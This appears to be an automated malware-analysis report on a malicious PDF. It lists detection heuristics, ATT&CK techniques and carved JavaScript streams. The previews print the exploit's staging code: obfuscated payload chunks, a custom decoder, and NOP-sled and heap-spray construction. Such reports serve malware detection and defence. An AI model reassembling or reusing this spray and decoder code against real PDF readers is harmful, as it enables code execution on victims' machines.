MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript that is heavily obfuscated. Heuristics indicate this JavaScript is part of an exploit cluster, likely leveraging a PDF vulnerability to achieve code execution. The script concatenates multiple strings into a variable named 'pay', which is then decoded using a custom algorithm. This decoded content is likely a secondary payload or further malicious code.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 32
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0010_001.jsf9ae5a33db8c7c1304813e927490f51369c0114e1b7e481ce8d3cc0f2f95f72e |
pdf-javascript-stream | PDF /JS object 10 at offset 0x3667 | 40 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var ppp=new Array();var nnn=new Array(); |
|||
javascript_obj0012_003.js4b79b97d4935cd2b901a576eefe7be0f816f4358f58b4a9126ff967a1878c524 |
pdf-javascript-stream | PDF /JS object 12 at offset 0x3719 | 68 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[1]='GJNLMENJHECEPECLMJFKLBLFDBECBDADECBDIDMCMELLJMFIANOBJCCDAN'; |
|||
javascript_obj0013_004.js4f51fe12d59294efe69f3fcba522a7c1e33606f70299ad8ef55f3801e38910bb |
pdf-javascript-stream | PDF /JS object 13 at offset 0x3797 | 92 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[2]='BALIIANEGJOGNMFHDPLLCNNCFHMHILNIFEICAAICKJCEDGCLFMBGIJAPFDFCJNNOIJIFAOMJHCHAEDMLAK'; |
|||
javascript_obj0014_005.js10589daa65a5097ee6d2b8a37141069c9a1f0ea999703bc774cff1961e23b95e |
pdf-javascript-stream | PDF /JS object 14 at offset 0x382D | 50 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[3]='HMKNCMOFINFPGFFNJFLPFKMMIOLMJGPLJHAGHCCM'; |
|||
javascript_obj0015_006.jsf86e12618118cc96c4cb9171f8dc58fc001334798f65bf5966ff492f4f17c494 |
pdf-javascript-stream | PDF /JS object 15 at offset 0x3899 | 32 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[4]='LJDALMJBGPADOFFCIMEHAB'; |
|||
javascript_obj0016_007.jsf343008922bdb67b6f756e621aba0189521d0c602027aa4dc19bc78e7039a90f |
pdf-javascript-stream | PDF /JS object 16 at offset 0x38F3 | 52 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[5]='DOFLEKAJKACKIDNLFGAJGOICNFNLBBBLGJLBOBJIBF'; |
|||
javascript_obj0017_008.jsaa64b7222b86e8c9471ff2cc84f9e7c93036ac2be656b903dbff4d31f2d0184a |
pdf-javascript-stream | PDF /JS object 17 at offset 0x3961 | 68 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[6]='BPNPELMDOFBLPOMENGNMGCPGMGNMBIAOJCFBHHJEPOKEKAACLFNNPGIHBM'; |
|||
javascript_obj0018_009.jsa7c3332722d920ea11c9a1d0e93169aa570ff432e92d914dba1692a8c74340d0 |
pdf-javascript-stream | PDF /JS object 18 at offset 0x39DF | 96 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[7]='HPHHEMLBIBHHCEHFOOCIPFNKOFHLFIHFLDMBBIPFDOHAFDLICMIKHOKAAHGJPJPIJKHLDNGIEAGIENFBPPPDBE'; |
|||
javascript_obj0019_010.js3432f1f0ab59f76f6c9ff54262b39e489f1f3384062fe72152d6e34be5370b84 |
pdf-javascript-stream | PDF /JS object 19 at offset 0x3A79 | 44 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[8]='FEOOJJJICJJICEAONMPCPNGJKEMGONJECG'; |
|||
javascript_obj0020_011.js61939e5da9310a70b929b1fcfebcf6b0d023b68de3b806576a64e0c888fb1e33 |
pdf-javascript-stream | PDF /JS object 20 at offset 0x3ADF | 80 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[9]='BFJNOIMHFMCCBCAPHGHKGHEFGEMNCOOKDMLMBLMACIFKCNBFLHMHPLOALABOJDKINPJNFN'; |
|||
javascript_obj0021_012.js00c349590fb9e559e6657ea5f56766c5842b71ff6a964fb6518527492639fab4 |
pdf-javascript-stream | PDF /JS object 21 at offset 0x3B69 | 35 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[10]='BEHCJJKONLFJLPBOFNOLLEGG'; |
|||
javascript_obj0022_013.js95cda11176a2c477629c613149a9ab08533760952d8fb332ad144d1495207b80 |
pdf-javascript-stream | PDF /JS object 22 at offset 0x3BC6 | 97 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[11]='JHEAFLKOGMMMPCGKEHPHFBHBMOPBEPACGKIEIEPBIBAOCHAEOLMPBIMMPOMALPDMOFOIDGIKBNEKMMGICEBJEF'; |
|||
javascript_obj0023_014.jseb8b25cd09d025c628612ee78f29c115897bc5c1a858dc47b620195c0496d618 |
pdf-javascript-stream | PDF /JS object 23 at offset 0x3C61 | 39 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[12]='IBMKKNCOOLDOPMNGONHFKNEHAKEG'; |
|||
javascript_obj0025_016.js94b999d7fd418e1ee22ca11265e1f4254a2299aa688479986892377998b4c53a |
pdf-javascript-stream | PDF /JS object 25 at offset 0x3D1B | 85 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[14]='GAGOPHCAMCEKFJIJGMNOOGICADNFPMHMJCBLAFLFLJJMGHIKAENFDJPILHJDAOHMLEFIGLOGPO'; |
|||
javascript_obj0026_017.js86d917e9428d0f8d6788588992428a1a90dfb852d67095ef963cc4ab6f74ca53 |
pdf-javascript-stream | PDF /JS object 26 at offset 0x3DAA | 81 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[15]='JBOGBAFPIHGGDFCLEECHDCEDICAFPGGCCIKALOJPNOPJOKDDPMHAMODCDOCCJOGEKJJIKB'; |
|||
javascript_obj0028_019.js1b0e5895b82f637e5a5e8bf65701d28c82aa374f20867d02322ea30364685777 |
pdf-javascript-stream | PDF /JS object 28 at offset 0x3E84 | 63 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[17]='ECICENMIJLAFKDGFGEDLFOMGOENBOPBIAFLNHFMKMEMAGIBABMFD'; |
|||
javascript_obj0029_020.jsba3b484dfaef144484e43e5d53b3819bb01370101788408aeb0c24c6f64b88a9 |
pdf-javascript-stream | PDF /JS object 29 at offset 0x3EFD | 69 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[18]='KKBPLKNOKBNIBICCMDOGNGFJFEAMIGFKPBDCPAPBLPEKACBMIEHMFNIPDD'; |
|||
javascript_obj0030_021.js4fae6815b8eb4b3473a9e3aeb7a04b9a2f9dbc9fb01bfcb3245c386a4fe4859e |
pdf-javascript-stream | PDF /JS object 30 at offset 0x3F7C | 95 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[19]='GIEJPMPLNPMBKLJIHAONKMOLFIPAGEDOJJJGPMIBOKGJPKMPJGMKIDHMAAGGGCNJEAICCAMAAKKKHNHEPMDB'; |
|||
javascript_obj0032_023.jsa4942a89274176102db8fe0380ab3a078ae7a2bc447afc97f70eefd5b69849f8 |
pdf-javascript-stream | PDF /JS object 32 at offset 0x405E | 89 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[21]='LJLLBNAOEHOBGDPBOAHFMPOBGJNBMJIJJAOHLMDGCNNBODLIFPOHJOFAAECFEMEDFNNDANOLKHMGHH'; |
|||
javascript_obj0033_024.js3040f9648032e7a9f15c1e5a60488bc13c6df3d4e035022299320cbc184adffe |
pdf-javascript-stream | PDF /JS object 33 at offset 0x40F1 | 87 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[22]='CEIBIPCAELLLKFDMPGBLOKCHJEIJDNBMMDLNBBJPKONKCDFMNJAENBANLLHEGAINNBJBIIIGGNKJ'; |
|||
javascript_obj0035_026.js69d519693877b040c0da2c89b6826dbab2457ee234392ec678ad88ef292f837c |
pdf-javascript-stream | PDF /JS object 35 at offset 0x41D5 | 77 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[24]='CENAGBCAANLEPHDINEFKKAPFPNFJCFJNBBBLHCIPDNEMPIFLHAOCDHEOKBKAPFHJHG'; |
|||
javascript_obj0036_027.jsb3abe5cf567cb1babf2b99a101485d9bd544ca5d5d6fb21fa12c52eb706723ea |
pdf-javascript-stream | PDF /JS object 36 at offset 0x425C | 89 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[25]='PDPLMNKKMKAPIPPEFBGCIEFNFPAKEJDFCJHMODDEHBBBPJHNHGHGMIGMCDKNBLODBIJGKIBFIBPIFG'; |
|||
javascript_obj0037_028.jsa823b9f2c7d1300640eec51c3d10ec7a1504077b93dc12332c480a9f5e6097f7 |
pdf-javascript-stream | PDF /JS object 37 at offset 0x42EF | 55 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[26]='OHMFEEKNEKEBGEHGHLCDAKMEPLNOLGHFDCFIACNCHMLD'; |
|||
javascript_obj0038_029.jsf5c614d9b7cf6673afb4d0e082697765f08bb4a3fdfb4a96fd411a87a07fe25f |
pdf-javascript-stream | PDF /JS object 38 at offset 0x4360 | 97 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[27]='KEGKHHHGJBGMKLDKHAMCMJHBMKIHHNFFJJBGDFGLPLCOAJNLMKEODHBNIGJMLIDJJEEEGILJMKFFFAJPLDPCKK'; |
|||
javascript_obj0040_031.jsd7e377619ea5da1acb1f37211c4d35e0224bedd9ad2d94e0e027a228e0e21573 |
pdf-javascript-stream | PDF /JS object 40 at offset 0x444E | 41 bytes |
Preview scriptFirst 1,000 lines of the extracted script
ppp[29]='GEDIKNCFDDLGHNJINPDDILODMHKLMB'; |
|||
javascript_obj0049_040.js5919c0d1d84a5a746be9f27963881ad88d4190b52b00795a7bba41f91757774f |
pdf-javascript-stream | PDF /JS object 49 at offset 0x46F1 | 49 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var pay='';for (i=0;i<ppp.length;i++)pay+=ppp[i]; |
|||
javascript_obj0050_041.js9882b77792295f132527561d187f85c94b2cd973564768e464959f18c36b3adf |
pdf-javascript-stream | PDF /JS object 50 at offset 0x475E | 51 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var nnn2='';for (i=0;i<nnn.length;i++)nnn2+=nnn[i]; |
|||
javascript_obj0051_042.jsd0c51bf80c2b774fd7e3f148d01ffbc945e29725fa0df8312c7ee2e2af01f03e |
pdf-javascript-stream | PDF /JS object 51 at offset 0x47CD | 121 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var nops='';for(i=0;i<nnn2.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+nnn2.charCodeAt(i+j)-65;nops+=String.fromCharCode(c);}
|
|||
javascript_obj0052_043.jsb1b2b43288ce70ec200b2f13b08007f27b53e440ecc0d66f3597d77149e048d4 |
pdf-javascript-stream | PDF /JS object 52 at offset 0x4888 | 119 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var coqu='';for(i=0;i<pay.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+pay.charCodeAt(i+j)-65;coqu+=String.fromCharCode(c);}
|
|||
javascript_obj0053_044.jscdb00d413dd3dc5b9d3e3780f1775e73dbb44b071a24019bd9d4f5472f12fea2 |
pdf-javascript-stream | PDF /JS object 53 at offset 0x4941 | 42 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var nop='';for(i=0;i<128;i++)nop=nop+nops; |
|||
javascript_obj0054_045.js887c4000e5cc4d9dfa6111f1e7cc04f6b55e03f5444509a403960cb208d351ee |
pdf-javascript-stream | PDF /JS object 54 at offset 0x49A7 | 52 bytes |
Preview scriptFirst 1,000 lines of the extracted script
heapblock=nop+coqu;big=nops;spr=20+heapblock.length; |
|||
javascript_obj0055_046.jsa653d442e9d9975c7c5174f7ea9a37c7bf1baee2798fc9562ccd829a21fc371f |
pdf-javascript-stream | PDF /JS object 55 at offset 0x4A15 | 95 bytes |
Preview scriptFirst 1,000 lines of the extracted script
while(big.length<spr)big=big+big;fill=big.substring(0,spr);blk=big.substring(0,big.length-spr); |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.